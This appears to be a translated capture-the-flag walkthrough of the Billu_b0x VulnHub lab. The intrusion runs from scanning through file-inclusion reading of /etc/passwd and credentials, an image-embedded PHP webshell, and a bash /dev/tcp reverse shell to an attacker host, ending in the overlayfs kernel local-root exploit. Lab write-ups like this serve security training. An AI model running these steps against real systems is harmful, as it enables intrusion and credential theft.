Hands-on test
Network: host-only mode
Objective of the exercise: obtain root privileges (the hint says to start from the web application)
Project location: https://www.vulnhub.com/entry/billu-b0x,188/
Host discovery

root@kali:~# arp-scan -l

root@kali:~# nmap -T4 -A -v 192.168.67.138
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: --==[[IndiShell Lab]]==--

Only SSH and HTTP are open. The OpenSSH 5.9p1-5ubuntu1 and Apache 2.2.22 builds are the Ubuntu 12.04 packages, which is worth remembering when choosing a kernel exploit later; the PHPSESSID cookie is also set without the HttpOnly flag.
Getting a foothold
The login page hints at SQL injection; the first idea was a POST injection on the login form, but that led nowhere.
Directory brute-forcing

root@kali:~# dirb http://192.168.67.138 /usr/share/dirb/wordlists/big.txt

http://192.168.67.138/add    # file upload form, no output after the upload
http://192.168.67.138/in     # phpinfo
http://192.168.67.138/test   # hints at a file inclusion (asks for a file parameter)
Downloading source
A GET request to /test returns nothing useful; the file parameter has to be sent by POST.
Reading /etc/passwd this way shows the users ica and root, which can log in over SSH.
Then download c.php, which holds the MySQL account and password.
Log in at http://192.168.67.138 with those credentials.
Behind the login there is a second upload point.
The upload checks the file content and renaming to .php does not work, so the way in is a picture with PHP appended (an "image horse"):
copy 1.jpg/b+1.php 2.jpg    # Windows cmd: /b concatenates the two files as binary, PHP after the image data

The file ends up under http://192.168.67.138/uploaded_images/
Analysing panel.php
It contains a file inclusion:

    if(isset($_POST['continue']))
    {
        $dir=getcwd();
        $choice=str_replace('./','',$_POST['load']);

        if($choice==='add')
        {
            include($dir.'/'.$choice.'.php');
            die();
        }

        if($choice==='show')
        {
            include($dir.'/'.$choice.'.php');
            die();
        }
        else
        {
            include($dir.'/'.$_POST['load']);
        }
    }

Note what the check actually covers: str_replace strips "./" from a copy of the input (a single, non-recursive pass), that copy is compared against add and show, and the fallback branch then includes the raw $_POST['load'], not $choice. The included path is therefore attacker-controlled relative to the web root: load=uploaded_images/2.jpg executes the PHP appended to the picture, and a ../ traversal would be included unchanged as well.
Reverse shell
The command is sent through the included webshell, URL-encoded in the POST body:

echo "bash -i >& /dev/tcp/192.168.67.1/4444 0>&1" | bash

www-data@indishell:/var/www$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Privilege escalation

uname -a          # kernel version
cat /etc/issue    # distribution version

Use a local privilege-escalation exploit matching that kernel and download it to the target. 37292.c is the Exploit-DB entry for the overlayfs local root (CVE-2015-1328); check the version printed by uname -a against the kernel range given in the exploit's header before relying on it. It is compiled on the target, so gcc has to be present there.

chmod 777 37292.c    # grant permissions (777 is more than needed; read access is enough to compile)
gcc 37292.c -o test  # compile

Run it:

www-data@indishell:/tmp$ ./test

That's it.
If anything here is wrong, please contact [email protected]
Original: Large column, Billu_b0x test